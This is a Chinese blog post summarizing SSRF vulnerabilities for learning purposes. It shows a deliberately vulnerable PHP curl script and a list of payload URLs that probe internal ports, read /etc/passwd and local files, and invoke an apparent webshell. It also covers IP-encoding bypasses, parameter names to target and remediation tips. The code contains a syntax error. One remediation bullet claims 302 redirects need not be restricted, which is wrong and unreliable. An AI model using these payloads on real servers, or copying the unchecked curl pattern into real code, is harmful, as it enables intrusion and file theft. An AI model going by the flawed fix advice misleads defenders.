QQ love member No. 3 seed player

know it then do it && APT086&QQ愛安全实验室成员

SSRF漏洞小结

07 Aug 2019 » 习信息安全系列

[TOC]

什么是SSRF (Server-side Request Forgery)服务端请求伪造

​ 由于某些应用需要调用其他服务器上的资源,需要传入一个目标地址供服务器去请求,假设这个目标地址被攻击者控制,就可以访问促使服务器访问内网的其他服务。

SSRF 漏洞源码

// ssrf.php
<?php
function curl($url){   //  程序获取url参数
    
    $ch=curl_init();   // 通过curl_init()初始化curl组件后
    curl_setopt($ch,CURLOPT_URL,$url); 
    // 将参数URL带入curl_setopt($ch,CURLOPT_URL,$url),
    curl_setopt($ch,CURLOPT_HEADER,0);
    curl_exec($ch); // 然后调用curl_exec请求该URL
    curl_close($ch);
}
$url=$_GET['url];
// 由于服务器端会将banner信息返回给客户端,所以可根据banner判断主机是否存在某些服务。
curl($url);
?>

Curl 支持的协议

Mac-PpBiBo $ curl -V
curl 7.54.0 (x86_64-apple-darwin18.0) libcurl/7.54.0 LibreSSL/2.6.5 zlib/1.2.11 nghttp2/1.24.1
Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtsp smb smbs smtp smtps telnet tftp 

探测内网

http://192.168.1.102/ssrf.php?url=dict://127.0.0.1:3306
view-source:http://192.168.1.102/ssrf.php?url=http://192.168.1.101/l.php
http://192.168.1.102/ssrf.php?url=http://192.168.1.101/robots.txt
http://192.168.1.102/ssrf.php?url=http://192.168.1.101/favicon.ico
http://192.168.1.102/ssrf.php?url=http://192.168.1.101/index.html
http://192.168.1.102/ssrf.php?url=file://C:/phpStudy/phptutorial/WWW/1.asp
http://192.168.1.102/ssrf.php?url=file:///etc/passwd
view-source:http://192.168.1.102/ssrf.php?url=file://C:/phpStudy/phptutorial/WWW/cmd.php
http://192.168.1.102/ssrf.php?url=http://192.168.1.101/muma.php?pass=phpinfo();
http://192.168.1.102/ssrf.php?url=

绕过技巧

短网址绕过

IP限制绕过

​ 十进制转换 八进制转换 十六进制转换 不同进制组合转换

https://abc.com@127.0.0.1http://127.0.0.1的请求是一样的

从WEB功能上寻找SSRF漏洞

  1. 分享:通过URL地址分享网页内容
  2. 转码服务:通过URL地址把原地址的内容调优为适合手机屏幕浏览的内容
  3. 在线翻译:通过URL地址翻译对应的网页内容。提供此功能的有国内的百度翻译,有道翻译
  4. 图片加载和下载:通过URL加载图片或下载
  5. 图片、文章收藏功能
  6. 未公开的api实现及其他通过参数调用外部资源的功能

URL中可能存在SSRF漏洞的关键字

share
url
img
wap
link
src
source
target
u
3g
display
sourceURL
image
imageURL
domain

修复方案:

​ • 限制协议为HTTP、HTTPS

​ • 不用限制302重定向

​ • 设置URL白名单或者限制内网IP


「 转载请声明博客地址及APT086&QQ愛安全实验室 」